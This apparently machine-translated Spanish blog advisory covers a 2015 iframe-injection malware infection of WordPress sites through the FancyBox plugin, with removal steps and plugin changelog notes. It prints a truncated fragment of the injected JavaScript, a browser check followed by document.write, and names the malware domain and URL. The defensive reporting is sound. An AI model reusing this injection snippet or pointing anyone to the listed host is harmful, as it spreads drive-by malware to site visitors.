A principios de esta semana una serie de sitios web y blogs WordPress, recibió advertencias de infectados con malware a través de Google Webmasters.
El problema al que Google Webmasters a que se refiere es la presencia de un código / guión iframe malware los sitios web de origen.
if (navigator.userAgent.match(/msie/i)) { document.write(‘ ’); }
Parece que es una vulnerabilidad a pluginacervo FancyBox para WordPress que hasta ayer (05.02.2015) no había sido actualizado desde hace mucho tiempo.
La solución de este problema y desinfección de sitios virus con este malware, es relativamente simple.
1. Desactive el complemento FancyBox.
2. Eliminar todos los archivos del complemento FancyBox del servidor (a través de FTP)
3. Instale la nueva versión del complemento (FancyBox 3.0.4)
FancyBox para WordPress 3.0.4
- Se cambió el nombre de la configuración afectada por el problema de seguridad mencionado en 3.0.3. Esto debería evitar que el código malintencionado aparezca en sitios donde se actualiza el complemento sin eliminar el código malintencionado.
FancyBox para WordPress 3.0.3
, Se ha corregido un problema de seguridad.
Información de Malware:
TIPO: Iframe redirección
TARGET: WordPress Fancybox
DOMINIO MALWARE: 203koko.eu
MALWARE URI: http://203koko.eu/hjnfh/ipframe2.php
CÓDIGO RAW DE MALWARE:
MALWARE ESCRITO: if (navigator.userAgent.match(/msie/i)) { document.write(‘
Eliminar el malware de tu sitio de WordPress.